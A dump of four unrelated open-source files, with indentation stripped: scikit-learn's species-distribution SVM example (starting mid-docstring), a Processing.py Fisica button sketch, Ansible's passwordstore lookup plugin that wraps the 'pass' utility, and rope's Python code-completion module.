also known as the Forest Small Rice Rat, a rodent that lives in Peru,
Colombia, Ecuador, Peru, and Venezuela.
References
----------
* `"Maximum entropy modeling of species geographic distributions"
<http://www.cs.princeton.edu/~schapire/papers/ecolmod.pdf>`_
S. J. Phillips, R. P. Anderson, R. E. Schapire - Ecological Modelling,
190:231-259, 2006.
"""
# Authors: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Jake Vanderplas <vanderplas@astro.washington.edu>
#
# License: BSD 3 clause
from __future__ import print_function
from time import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets.base import Bunch
from sklearn.datasets import fetch_species_distributions
from sklearn.datasets.species_distributions import construct_grids
from sklearn import svm, metrics
# if basemap is available, we'll use it.
# otherwise, we'll improvise later...
try:
from mpl_toolkits.basemap import Basemap
basemap = True
except ImportError:
basemap = False
print(__doc__)
def create_species_bunch(species_name, train, test, coverages, xgrid, ygrid):
"""Create a bunch with information about a particular organism
This will use the test/train record arrays to extract the
data specific to the given species name.
"""
bunch = Bunch(name=' '.join(species_name.split("_")[:2]))
species_name = species_name.encode('ascii')
points = dict(test=test, train=train)
for label, pts in points.items():
# choose points associated with the desired species
pts = pts[pts['species'] == species_name]
bunch['pts_%s' % label] = pts
# determine coverage values for each of the training & testing points
ix = np.searchsorted(xgrid, pts['dd long'])
iy = np.searchsorted(ygrid, pts['dd lat'])
bunch['cov_%s' % label] = coverages[:, -iy, ix].T
return bunch
def plot_species_distribution(species=("bradypus_variegatus_0",
"microryzomys_minutus_0")):
"""
Plot the species distribution.
"""
if len(species) > 2:
print("Note: when more than two species are provided,"
" only the first two will be used")
t0 = time()
# Load the compressed data
data = fetch_species_distributions()
# Set up the data grid
xgrid, ygrid = construct_grids(data)
# The grid in x,y coordinates
X, Y = np.meshgrid(xgrid, ygrid[::-1])
# create a bunch for each species
BV_bunch = create_species_bunch(species[0],
data.train, data.test,
data.coverages, xgrid, ygrid)
MM_bunch = create_species_bunch(species[1],
data.train, data.test,
data.coverages, xgrid, ygrid)
# background points (grid coordinates) for evaluation
np.random.seed(13)
background_points = np.c_[np.random.randint(low=0, high=data.Ny,
size=10000),
np.random.randint(low=0, high=data.Nx,
size=10000)].T
# We'll make use of the fact that coverages[6] has measurements at all
# land points. This will help us decide between land and water.
land_reference = data.coverages[6]
# Fit, predict, and plot for each species.
for i, species in enumerate([BV_bunch, MM_bunch]):
print("_" * 80)
print("Modeling distribution of species '%s'" % species.name)
# Standardize features
mean = species.cov_train.mean(axis=0)
std = species.cov_train.std(axis=0)
train_cover_std = (species.cov_train - mean) / std
# Fit OneClassSVM
print(" - fit OneClassSVM ... ", end='')
clf = svm.OneClassSVM(nu=0.1, kernel="rbf", gamma=0.5)
clf.fit(train_cover_std)
print("done.")
# Plot map of South America
plt.subplot(1, 2, i + 1)
if basemap:
print(" - plot coastlines using basemap")
m = Basemap(projection='cyl', llcrnrlat=Y.min(),
urcrnrlat=Y.max(), llcrnrlon=X.min(),
urcrnrlon=X.max(), resolution='c')
m.drawcoastlines()
m.drawcountries()
else:
print(" - plot coastlines from coverage")
plt.contour(X, Y, land_reference,
levels=[-9999], colors="k",
linestyles="solid")
plt.xticks([])
plt.yticks([])
print(" - predict species distribution")
# Predict species distribution using the training data
Z = np.ones((data.Ny, data.Nx), dtype=np.float64)
# We'll predict only for the land points.
idx = np.where(land_reference > -9999)
coverages_land = data.coverages[:, idx[0], idx[1]].T
pred = clf.decision_function((coverages_land - mean) / std)[:, 0]
Z *= pred.min()
Z[idx[0], idx[1]] = pred
levels = np.linspace(Z.min(), Z.max(), 25)
Z[land_reference == -9999] = -9999
# plot contours of the prediction
plt.contourf(X, Y, Z, levels=levels, cmap=plt.cm.Reds)
plt.colorbar(format='%.2f')
# scatter training/testing points
plt.scatter(species.pts_train['dd long'], species.pts_train['dd lat'],
s=2 ** 2, c='black',
marker='^', label='train')
plt.scatter(species.pts_test['dd long'], species.pts_test['dd lat'],
s=2 ** 2, c='black',
marker='x', label='test')
plt.legend()
plt.title(species.name)
plt.axis('equal')
# Compute AUC with regards to background points
pred_background = Z[background_points[0], background_points[1]]
pred_test = clf.decision_function((species.cov_test - mean)
/ std)[:, 0]
scores = np.r_[pred_test, pred_background]
y = np.r_[np.ones(pred_test.shape), np.zeros(pred_background.shape)]
fpr, tpr, thresholds = metrics.roc_curve(y, scores)
roc_auc = metrics.auc(fpr, tpr)
plt.text(-35, -70, "AUC: %.3f" % roc_auc, ha="right")
print("\n Area under the ROC curve : %f" % roc_auc)
print("\ntime elapsed: %.2fs" % (time() - t0))
plot_species_distribution()
plt.show()
| bsd-3-clause |
tildebyte/processing.py | examples.py/Fisica/buttons.py | 5 | 2754 | """
* Buttons and bodies
*
* by Ricard Marxer
*
* This example shows how to create bodies.
* It also demonstrates the use of bodies as buttons.
"""
from fisica import Fisica, FWorld, FBox, FCircle, FPoly
boxButton = None
circleButton = None
polyButton = None
world = None
buttonColor = color(0x15, 0x5A, 0xAD)
hoverColor = color(0x55, 0xAA, 0x11)
bodyColor = color(0x6E, 0x05, 0x95)
def setup():
global boxButton, circleButton, polyButton, world
size(400, 400)
smooth()
Fisica.init(this)
world = FWorld()
world.setEdges()
world.remove(world.left)
world.remove(world.right)
world.remove(world.top)
boxButton = FBox(40, 40)
boxButton.setPosition(width/4, 100)
boxButton.setStatic(True)
boxButton.setFillColor(buttonColor)
boxButton.setNoStroke()
world.add(boxButton)
circleButton = FCircle(40)
circleButton.setPosition(2*width/4, 100)
circleButton.setStatic(True)
circleButton.setFillColor(buttonColor)
circleButton.setNoStroke()
world.add(circleButton)
polyButton = FPoly()
polyButton.vertex(20, 20)
polyButton.vertex(-20, 20)
polyButton.vertex(0, -20)
polyButton.setPosition(3*width/4, 100)
polyButton.setStatic(True)
polyButton.setFillColor(buttonColor)
polyButton.setNoStroke()
world.add(polyButton)
def draw():
background(255)
world.step()
world.draw()
def mousePressed():
pressed = world.getBody(mouseX, mouseY)
if pressed == boxButton:
myBox = FBox(40, 40)
myBox.setPosition(width/4, 200)
myBox.setRotation(random(TWO_PI))
myBox.setVelocity(0, 200)
myBox.setFillColor(bodyColor)
myBox.setNoStroke()
world.add(myBox)
elif pressed == circleButton:
myCircle = FCircle(40)
myCircle.setPosition(2*width/4, 200)
myCircle.setRotation(random(TWO_PI))
myCircle.setVelocity(0, 200)
myCircle.setFillColor(bodyColor)
myCircle.setNoStroke()
world.add(myCircle)
elif pressed == polyButton:
myPoly = FPoly()
myPoly.vertex(20, 20)
myPoly.vertex(-20, 20)
myPoly.vertex(0, -20)
myPoly.setPosition(3*width/4, 200)
myPoly.setRotation(random(TWO_PI))
myPoly.setVelocity(0, 200)
myPoly.setFillColor(bodyColor)
myPoly.setNoStroke()
world.add(myPoly)
def mouseMoved():
hovered = world.getBody(mouseX, mouseY)
if hovered in (boxButton, circleButton, polyButton):
hovered.setFillColor(hoverColor)
else:
boxButton.setFillColor(buttonColor)
circleButton.setFillColor(buttonColor)
polyButton.setFillColor(buttonColor)
def keyPressed():
saveFrame("screenshot.png")
| apache-2.0 |
jnerin/ansible | lib/ansible/plugins/lookup/passwordstore.py | 16 | 10116 | # (c) 2017, Patrick Deelman <patrick@patrickdeelman.nl>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: passwordstore
version_added: "2.3"
author:
- Patrick Deelman <patrick@patrickdeelman.nl>
short_description: manage passwords with passwordstore.org's pass utility
description:
- Enables Ansible to retrieve, create or update passwords from the passwordstore.org pass utility.
It also retrieves YAML style keys stored as multilines in the passwordfile.
options:
_terms:
description: query key
required: True
passwordstore:
description: location of the password store
default: '~/.password-store'
directory:
description: directory of the password store
default: null
env:
- name: PASSWORD_STORE_DIR
create:
description: flag to create the password
type: boolean
default: False
overwrite:
description: flag to overwrite the password
type: boolean
default: False
returnall:
description: flag to return all the contents of the password store
type: boolean
default: False
subkey:
description: subkey to return
default: password
userpass:
description: user password
length:
description: password length
type: integer
default: 16
"""
EXAMPLES = """
# Debug is used for examples, BAD IDEA to show passwords on screen
- name: Basic lookup. Fails if example/test doesn't exist
debug: msg="{{ lookup('passwordstore', 'example/test')}}"
- name: Create pass with random 16 character password. If password exists just give the password
debug: var=mypassword
vars:
mypassword: "{{ lookup('passwordstore', 'example/test create=true')}}"
- name: Different size password
debug: msg="{{ lookup('passwordstore', 'example/test create=true length=42')}}"
- name: Create password and overwrite the password if it exists. As a bonus, this module includes the old password inside the pass file
debug: msg="{{ lookup('passwordstore', 'example/test create=true overwrite=true')}}"
- name: Return the value for user in the KV pair user, username
debug: msg="{{ lookup('passwordstore', 'example/test subkey=user')}}"
- name: Return the entire password file content
set_fact: passfilecontent="{{ lookup('passwordstore', 'example/test returnall=true')}}"
"""
RETURN = """
_raw:
description:
- a password
"""
import os
import subprocess
import time
from distutils import util
from ansible.errors import AnsibleError, AnsibleAssertionError
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.utils.encrypt import random_password
from ansible.plugins.lookup import LookupBase
# backhacked check_output with input for python 2.7
# http://stackoverflow.com/questions/10103551/passing-data-to-subprocess-check-output
def check_output2(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
if 'stderr' in kwargs:
raise ValueError('stderr argument not allowed, it will be overridden.')
if 'input' in kwargs:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
b_inputdata = to_bytes(kwargs['input'], errors='surrogate_or_strict')
del kwargs['input']
kwargs['stdin'] = subprocess.PIPE
else:
b_inputdata = None
process = subprocess.Popen(*popenargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
try:
b_out, b_err = process.communicate(b_inputdata)
except:
process.kill()
process.wait()
raise
retcode = process.poll()
if retcode != 0 or \
b'encryption failed: Unusable public key' in b_out or \
b'encryption failed: Unusable public key' in b_err:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(
retcode,
cmd,
to_native(b_out + b_err, errors='surrogate_or_strict')
)
return b_out
class LookupModule(LookupBase):
def parse_params(self, term):
# I went with the "traditional" param followed with space separated KV pairs.
# Waiting for final implementation of lookup parameter parsing.
# See: https://github.com/ansible/ansible/issues/12255
params = term.split()
if len(params) > 0:
# the first param is the pass-name
self.passname = params[0]
# next parse the optional parameters in keyvalue pairs
try:
for param in params[1:]:
name, value = param.split('=')
if name not in self.paramvals:
raise AnsibleAssertionError('%s not in paramvals' % name)
self.paramvals[name] = value
except (ValueError, AssertionError) as e:
raise AnsibleError(e)
# check and convert values
try:
for key in ['create', 'returnall', 'overwrite']:
if not isinstance(self.paramvals[key], bool):
self.paramvals[key] = util.strtobool(self.paramvals[key])
except (ValueError, AssertionError) as e:
raise AnsibleError(e)
if not isinstance(self.paramvals['length'], int):
if self.paramvals['length'].isdigit():
self.paramvals['length'] = int(self.paramvals['length'])
else:
raise AnsibleError("{0} is not a correct value for length".format(self.paramvals['length']))
# Set PASSWORD_STORE_DIR if directory is set
if self.paramvals['directory']:
if os.path.isdir(self.paramvals['directory']):
os.environ['PASSWORD_STORE_DIR'] = self.paramvals['directory']
else:
raise AnsibleError('Passwordstore directory \'{0}\' does not exist'.format(self.paramvals['directory']))
def check_pass(self):
try:
self.passoutput = to_text(
check_output2(["pass", self.passname]),
errors='surrogate_or_strict'
).splitlines()
self.password = self.passoutput[0]
self.passdict = {}
for line in self.passoutput[1:]:
if ':' in line:
name, value = line.split(':', 1)
self.passdict[name.strip()] = value.strip()
except (subprocess.CalledProcessError) as e:
if e.returncode == 1 and 'not in the password store' in e.output:
# if pass returns 1 and return string contains 'is not in the password store.'
# We need to determine if this is valid or Error.
if not self.paramvals['create']:
raise AnsibleError('passname: {0} not found, use create=True'.format(self.passname))
else:
return False
else:
raise AnsibleError(e)
return True
def get_newpass(self):
if self.paramvals['userpass']:
newpass = self.paramvals['userpass']
else:
newpass = random_password(length=self.paramvals['length'])
return newpass
def update_password(self):
# generate new password, insert old lines from current result and return new password
newpass = self.get_newpass()
datetime = time.strftime("%d/%m/%Y %H:%M:%S")
msg = newpass + '\n' + '\n'.join(self.passoutput[1:])
msg += "\nlookup_pass: old password was {0} (Updated on {1})\n".format(self.password, datetime)
try:
check_output2(['pass', 'insert', '-f', '-m', self.passname], input=msg)
except (subprocess.CalledProcessError) as e:
raise AnsibleError(e)
return newpass
def generate_password(self):
# generate new file and insert lookup_pass: Generated by Ansible on {date}
# use pwgen to generate the password and insert values with pass -m
newpass = self.get_newpass()
datetime = time.strftime("%d/%m/%Y %H:%M:%S")
msg = newpass + '\n' + "lookup_pass: First generated by ansible on {0}\n".format(datetime)
try:
check_output2(['pass', 'insert', '-f', '-m', self.passname], input=msg)
except (subprocess.CalledProcessError) as e:
raise AnsibleError(e)
return newpass
def get_passresult(self):
if self.paramvals['returnall']:
return os.linesep.join(self.passoutput)
if self.paramvals['subkey'] == 'password':
return self.password
else:
if self.paramvals['subkey'] in self.passdict:
return self.passdict[self.paramvals['subkey']]
else:
return None
def run(self, terms, variables, **kwargs):
result = []
self.paramvals = {
'subkey': 'password',
'directory': variables.get('passwordstore'),
'create': False,
'returnall': False,
'overwrite': False,
'userpass': '',
'length': 16,
}
for term in terms:
self.parse_params(term) # parse the input into paramvals
if self.check_pass(): # password exists
if self.paramvals['overwrite'] and self.paramvals['subkey'] == 'password':
result.append(self.update_password())
else:
result.append(self.get_passresult())
else: # password does not exist
if self.paramvals['create']:
result.append(self.generate_password())
return result
| gpl-3.0 |
hkupty/python-mode | pymode/libs2/rope/contrib/codeassist.py | 26 | 25440 | import keyword
import sys
import warnings
import rope.base.codeanalyze
import rope.base.evaluate
from rope.base import pyobjects, pyobjectsdef, pynames, builtins, exceptions, worder
from rope.base.codeanalyze import SourceLinesAdapter
from rope.contrib import fixsyntax
from rope.refactor import functionutils
def code_assist(project, source_code, offset, resource=None,
templates=None, maxfixes=1, later_locals=True):
"""Return python code completions as a list of `CodeAssistProposal`\s
`resource` is a `rope.base.resources.Resource` object. If
provided, relative imports are handled.
`maxfixes` is the maximum number of errors to fix if the code has
errors in it.
If `later_locals` is `False` names defined in this scope and after
this line is ignored.
"""
if templates is not None:
warnings.warn('Codeassist no longer supports templates',
DeprecationWarning, stacklevel=2)
assist = _PythonCodeAssist(
project, source_code, offset, resource=resource,
maxfixes=maxfixes, later_locals=later_locals)
return assist()
def starting_offset(source_code, offset):
"""Return the offset in which the completion should be inserted
Usually code assist proposals should be inserted like::
completion = proposal.name
result = (source_code[:starting_offset] +
completion + source_code[offset:])
Where starting_offset is the offset returned by this function.
"""
word_finder = worder.Worder(source_code, True)
expression, starting, starting_offset = \
word_finder.get_splitted_primary_before(offset)
return starting_offset
def get_doc(project, source_code, offset, resource=None, maxfixes=1):
"""Get the pydoc"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is None:
return None
pyobject = pyname.get_object()
return PyDocExtractor().get_doc(pyobject)
def get_calltip(project, source_code, offset, resource=None,
maxfixes=1, ignore_unknown=False, remove_self=False):
"""Get the calltip of a function
The format of the returned string is
``module_name.holding_scope_names.function_name(arguments)``. For
classes `__init__()` and for normal objects `__call__()` function
is used.
Note that the offset is on the function itself *not* after the its
open parenthesis. (Actually it used to be the other way but it
was easily confused when string literals were involved. So I
decided it is better for it not to try to be too clever when it
cannot be clever enough). You can use a simple search like::
offset = source_code.rindex('(', 0, offset) - 1
to handle simple situations.
If `ignore_unknown` is `True`, `None` is returned for functions
without source-code like builtins and extensions.
If `remove_self` is `True`, the first parameter whose name is self
will be removed for methods.
"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is None:
return None
pyobject = pyname.get_object()
return PyDocExtractor().get_calltip(pyobject, ignore_unknown, remove_self)
def get_definition_location(project, source_code, offset,
resource=None, maxfixes=1):
"""Return the definition location of the python name at `offset`
Return a (`rope.base.resources.Resource`, lineno) tuple. If no
`resource` is given and the definition is inside the same module,
the first element of the returned tuple would be `None`. If the
location cannot be determined ``(None, None)`` is returned.
"""
fixer = fixsyntax.FixSyntax(project.pycore, source_code,
resource, maxfixes)
pymodule = fixer.get_pymodule()
pyname = fixer.pyname_at(offset)
if pyname is not None:
module, lineno = pyname.get_definition_location()
if module is not None:
return module.get_module().get_resource(), lineno
return (None, None)
def find_occurrences(*args, **kwds):
import rope.contrib.findit
warnings.warn('Use `rope.contrib.findit.find_occurrences()` instead',
DeprecationWarning, stacklevel=2)
return rope.contrib.findit.find_occurrences(*args, **kwds)
class CompletionProposal(object):
"""A completion proposal
The `scope` instance variable shows where proposed name came from
and can be 'global', 'local', 'builtin', 'attribute', 'keyword',
'imported', 'parameter_keyword'.
The `type` instance variable shows the approximate type of the
proposed object and can be 'instance', 'class', 'function', 'module',
and `None`.
All possible relations between proposal's `scope` and `type` are shown
in the table below (different scopes in rows and types in columns):
| instance | class | function | module | None
local | + | + | + | + |
global | + | + | + | + |
builtin | + | + | + | |
attribute | + | + | + | + |
imported | + | + | + | + |
keyword | | | | | +
parameter_keyword | | | | | +
"""
def __init__(self, name, scope, pyname=None):
self.name = name
self.pyname = pyname
self.scope = self._get_scope(scope)
def __str__(self):
return '%s (%s, %s)' % (self.name, self.scope, self.type)
def __repr__(self):
return str(self)
@property
def parameters(self):
"""The names of the parameters the function takes.
Returns None if this completion is not a function.
"""
pyname = self.pyname
if isinstance(pyname, pynames.ImportedName):
pyname = pyname._get_imported_pyname()
if isinstance(pyname, pynames.DefinedName):
pyobject = pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
return pyobject.get_param_names()
@property
def type(self):
pyname = self.pyname
if isinstance(pyname, builtins.BuiltinName):
pyobject = pyname.get_object()
if isinstance(pyobject, builtins.BuiltinFunction):
return 'function'
elif isinstance(pyobject, builtins.BuiltinClass):
clsobj = pyobject.builtin
return 'class'
elif isinstance(pyobject, builtins.BuiltinObject) or \
isinstance(pyobject, builtins.BuiltinName):
return 'instance'
elif isinstance(pyname, pynames.ImportedModule):
return 'module'
elif isinstance(pyname, pynames.ImportedName) or \
isinstance(pyname, pynames.DefinedName):
pyobject = pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
return 'function'
if isinstance(pyobject, pyobjects.AbstractClass):
return 'class'
return 'instance'
def _get_scope(self, scope):
if isinstance(self.pyname, builtins.BuiltinName):
return 'builtin'
if isinstance(self.pyname, pynames.ImportedModule) or \
isinstance(self.pyname, pynames.ImportedName):
return 'imported'
return scope
def get_doc(self):
"""Get the proposed object's docstring.
Returns None if it can not be get.
"""
if not self.pyname:
return None
pyobject = self.pyname.get_object()
if not hasattr(pyobject, 'get_doc'):
return None
return self.pyname.get_object().get_doc()
@property
def kind(self):
warnings.warn("the proposal's `kind` property is deprecated, " \
"use `scope` instead")
return self.scope
# leaved for backward compatibility
CodeAssistProposal = CompletionProposal
class NamedParamProposal(CompletionProposal):
"""A parameter keyword completion proposal
Holds reference to ``_function`` -- the function which
parameter ``name`` belongs to. This allows to determine
default value for this parameter.
"""
def __init__(self, name, function):
self.argname = name
name = '%s=' % name
super(NamedParamProposal, self).__init__(name, 'parameter_keyword')
self._function = function
def get_default(self):
"""Get a string representation of a param's default value.
Returns None if there is no default value for this param.
"""
definfo = functionutils.DefinitionInfo.read(self._function)
for arg, default in definfo.args_with_defaults:
if self.argname == arg:
return default
return None
def sorted_proposals(proposals, scopepref=None, typepref=None):
"""Sort a list of proposals
Return a sorted list of the given `CodeAssistProposal`\s.
`scopepref` can be a list of proposal scopes. Defaults to
``['parameter_keyword', 'local', 'global', 'imported',
'attribute', 'builtin', 'keyword']``.
`typepref` can be a list of proposal types. Defaults to
``['class', 'function', 'instance', 'module', None]``.
(`None` stands for completions with no type like keywords.)
"""
sorter = _ProposalSorter(proposals, scopepref, typepref)
return sorter.get_sorted_proposal_list()
def starting_expression(source_code, offset):
"""Return the expression to complete"""
word_finder = worder.Worder(source_code, True)
expression, starting, starting_offset = \
word_finder.get_splitted_primary_before(offset)
if expression:
return expression + '.' + starting
return starting
def default_templates():
warnings.warn('default_templates() is deprecated.',
DeprecationWarning, stacklevel=2)
return {}
class _PythonCodeAssist(object):
def __init__(self, project, source_code, offset, resource=None,
maxfixes=1, later_locals=True):
self.project = project
self.pycore = self.project.pycore
self.code = source_code
self.resource = resource
self.maxfixes = maxfixes
self.later_locals = later_locals
self.word_finder = worder.Worder(source_code, True)
self.expression, self.starting, self.offset = \
self.word_finder.get_splitted_primary_before(offset)
keywords = keyword.kwlist
def _find_starting_offset(self, source_code, offset):
current_offset = offset - 1
while current_offset >= 0 and (source_code[current_offset].isalnum() or
source_code[current_offset] in '_'):
current_offset -= 1;
return current_offset + 1
def _matching_keywords(self, starting):
result = []
for kw in self.keywords:
if kw.startswith(starting):
result.append(CompletionProposal(kw, 'keyword'))
return result
def __call__(self):
if self.offset > len(self.code):
return []
completions = list(self._code_completions().values())
if self.expression.strip() == '' and self.starting.strip() != '':
completions.extend(self._matching_keywords(self.starting))
return completions
def _dotted_completions(self, module_scope, holding_scope):
result = {}
found_pyname = rope.base.evaluate.eval_str(holding_scope,
self.expression)
if found_pyname is not None:
element = found_pyname.get_object()
compl_scope = 'attribute'
if isinstance(element, (pyobjectsdef.PyModule,
pyobjectsdef.PyPackage)):
compl_scope = 'imported'
for name, pyname in element.get_attributes().items():
if name.startswith(self.starting):
result[name] = CompletionProposal(name, compl_scope, pyname)
return result
def _undotted_completions(self, scope, result, lineno=None):
if scope.parent != None:
self._undotted_completions(scope.parent, result)
if lineno is None:
names = scope.get_propagated_names()
else:
names = scope.get_names()
for name, pyname in names.items():
if name.startswith(self.starting):
compl_scope = 'local'
if scope.get_kind() == 'Module':
compl_scope = 'global'
if lineno is None or self.later_locals or \
not self._is_defined_after(scope, pyname, lineno):
result[name] = CompletionProposal(name, compl_scope,
pyname)
def _from_import_completions(self, pymodule):
module_name = self.word_finder.get_from_module(self.offset)
if module_name is None:
return {}
pymodule = self._find_module(pymodule, module_name)
result = {}
for name in pymodule:
if name.startswith(self.starting):
result[name] = CompletionProposal(name, scope='global',
pyname=pymodule[name])
return result
def _find_module(self, pymodule, module_name):
dots = 0
while module_name[dots] == '.':
dots += 1
pyname = pynames.ImportedModule(pymodule,
module_name[dots:], dots)
return pyname.get_object()
def _is_defined_after(self, scope, pyname, lineno):
location = pyname.get_definition_location()
if location is not None and location[1] is not None:
if location[0] == scope.pyobject.get_module() and \
lineno <= location[1] <= scope.get_end():
return True
def _code_completions(self):
lineno = self.code.count('\n', 0, self.offset) + 1
fixer = fixsyntax.FixSyntax(self.pycore, self.code,
self.resource, self.maxfixes)
pymodule = fixer.get_pymodule()
module_scope = pymodule.get_scope()
code = pymodule.source_code
lines = code.split('\n')
result = {}
start = fixsyntax._logical_start(lines, lineno)
indents = fixsyntax._get_line_indents(lines[start - 1])
inner_scope = module_scope.get_inner_scope_for_line(start, indents)
if self.word_finder.is_a_name_after_from_import(self.offset):
return self._from_import_completions(pymodule)
if self.expression.strip() != '':
result.update(self._dotted_completions(module_scope, inner_scope))
else:
result.update(self._keyword_parameters(module_scope.pyobject,
inner_scope))
self._undotted_completions(inner_scope, result, lineno=lineno)
return result
def _keyword_parameters(self, pymodule, scope):
offset = self.offset
if offset == 0:
return {}
word_finder = worder.Worder(self.code, True)
lines = SourceLinesAdapter(self.code)
lineno = lines.get_line_number(offset)
if word_finder.is_on_function_call_keyword(offset - 1):
name_finder = rope.base.evaluate.ScopeNameFinder(pymodule)
function_parens = word_finder.\
find_parens_start_from_inside(offset - 1)
primary = word_finder.get_primary_at(function_parens - 1)
try:
function_pyname = rope.base.evaluate.\
eval_str(scope, primary)
except exceptions.BadIdentifierError, e:
return {}
if function_pyname is not None:
pyobject = function_pyname.get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
pass
elif isinstance(pyobject, pyobjects.AbstractClass) and \
'__init__' in pyobject:
pyobject = pyobject['__init__'].get_object()
elif '__call__' in pyobject:
pyobject = pyobject['__call__'].get_object()
if isinstance(pyobject, pyobjects.AbstractFunction):
param_names = []
param_names.extend(
pyobject.get_param_names(special_args=False))
result = {}
for name in param_names:
if name.startswith(self.starting):
result[name + '='] = NamedParamProposal(
name, pyobject
)
return result
return {}
class _ProposalSorter(object):
"""Sort a list of code assist proposals"""
def __init__(self, code_assist_proposals, scopepref=None, typepref=None):
self.proposals = code_assist_proposals
if scopepref is None:
scopepref = ['parameter_keyword', 'local', 'global', 'imported',
'attribute', 'builtin', 'keyword']
self.scopepref = scopepref
if typepref is None:
typepref = ['class', 'function', 'instance', 'module', None]
self.typerank = dict((type, index)
for index, type in enumerate(typepref))
def get_sorted_proposal_list(self):
"""Return a list of `CodeAssistProposal`"""
proposals = {}
for proposal in self.proposals:
proposals.setdefault(proposal.scope, []).append(proposal)
result = []
for scope in self.scopepref:
scope_proposals = proposals.get(scope, [])
scope_proposals = [proposal for proposal in scope_proposals
if proposal.type in self.typerank]
scope_proposals.sort(self._proposal_cmp)
result.extend(scope_proposals)
return result
def _proposal_cmp(self, proposal1, proposal2):
if proposal1.type != proposal2.type:
return cmp(self.typerank.get(proposal1.type, 100),
self.typerank.get(proposal2.type, 100))
return self._compare_underlined_names(proposal1.name,
proposal2.name)
def _compare_underlined_names(self, name1, name2):
def underline_count(name):
result = 0
while result < len(name) and name[result] == '_':
result += 1
return result
underline_count1 = underline_count(name1)
underline_count2 = underline_count(name2)
if underline_count1 != underline_count2:
return cmp(underline_count1, underline_count2)
return cmp(name1, name2)
class PyDocExtractor(object):
def get_doc(self, pyobject):
if isinstance(pyobject, pyobjects.AbstractFunction):
return self._get_function_docstring(pyobject)
elif isinstance(pyobject, pyobjects.AbstractClass):
return self._get_class_docstring(pyobject)
elif isinstance(pyobject, pyobjects.AbstractModule):
return self._trim_docstring(pyobject.get_doc())
return None
def get_calltip(self, pyobject, ignore_unknown=False, remove_self=False):
try:
if isinstance(pyobject, pyobjects.AbstractClass):
pyobject = pyobject['__init__'].get_object()
if not isinstance(pyobject, pyobjects.AbstractFunction):
pyobject = pyobject['__call__'].get_object()
except exceptions.AttributeNotFoundError:
return None
if ignore_unknown and not isinstance(pyobject, pyobjects.PyFunction):
return
if isinstance(pyobject, pyobjects.AbstractFunction):
result = self._get_function_signature(pyobject, add_module=True)
if remove_self and self._is_method(pyobject):
return result.replace('(self)', '()').replace('(self, ', '(')
return result
def _get_class_docstring(self, pyclass):
contents = self._trim_docstring(pyclass.get_doc(), 2)
supers = [super.get_name() for super in pyclass.get_superclasses()]
doc = 'class %s(%s):\n\n' % (pyclass.get_name(), ', '.join(supers)) + contents
if '__init__' in pyclass:
init = pyclass['__init__'].get_object()
if isinstance(init, pyobjects.AbstractFunction):
doc += '\n\n' + self._get_single_function_docstring(init)
return doc
def _get_function_docstring(self, pyfunction):
functions = [pyfunction]
if self._is_method(pyfunction):
functions.extend(self._get_super_methods(pyfunction.parent,
pyfunction.get_name()))
return '\n\n'.join([self._get_single_function_docstring(function)
for function in functions])
def _is_method(self, pyfunction):
return isinstance(pyfunction, pyobjects.PyFunction) and \
isinstance(pyfunction.parent, pyobjects.PyClass)
def _get_single_function_docstring(self, pyfunction):
signature = self._get_function_signature(pyfunction)
docs = self._trim_docstring(pyfunction.get_doc(), indents=2)
return signature + ':\n\n' + docs
def _get_super_methods(self, pyclass, name):
result = []
for super_class in pyclass.get_superclasses():
if name in super_class:
function = super_class[name].get_object()
if isinstance(function, pyobjects.AbstractFunction):
result.append(function)
result.extend(self._get_super_methods(super_class, name))
return result
def _get_function_signature(self, pyfunction, add_module=False):
location = self._location(pyfunction, add_module)
if isinstance(pyfunction, pyobjects.PyFunction):
info = functionutils.DefinitionInfo.read(pyfunction)
return location + info.to_string()
else:
return '%s(%s)' % (location + pyfunction.get_name(),
', '.join(pyfunction.get_param_names()))
def _location(self, pyobject, add_module=False):
location = []
parent = pyobject.parent
while parent and not isinstance(parent, pyobjects.AbstractModule):
location.append(parent.get_name())
location.append('.')
parent = parent.parent
if add_module:
if isinstance(pyobject, pyobjects.PyFunction):
module = pyobject.get_module()
location.insert(0, self._get_module(pyobject))
if isinstance(parent, builtins.BuiltinModule):
location.insert(0, parent.get_name() + '.')
return ''.join(location)
def _get_module(self, pyfunction):
module = pyfunction.get_module()
if module is not None:
resource = module.get_resource()
if resource is not None:
return pyfunction.pycore.modname(resource) + '.'
return ''
def _trim_docstring(self, docstring, indents=0):
"""The sample code from :PEP:`257`"""
if not docstring:
return ''
# Convert tabs to spaces (following normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxint
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxint:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join((' ' * indents + line for line in trimmed))
# Deprecated classes
class TemplateProposal(CodeAssistProposal):
def __init__(self, name, template):
warnings.warn('TemplateProposal is deprecated.',
DeprecationWarning, stacklevel=2)
super(TemplateProposal, self).__init__(name, 'template')
self.template = template
class Template(object):
def __init__(self, template):
self.template = template
warnings.warn('Template is deprecated.',
DeprecationWarning, stacklevel=2)
def variables(self):
return []
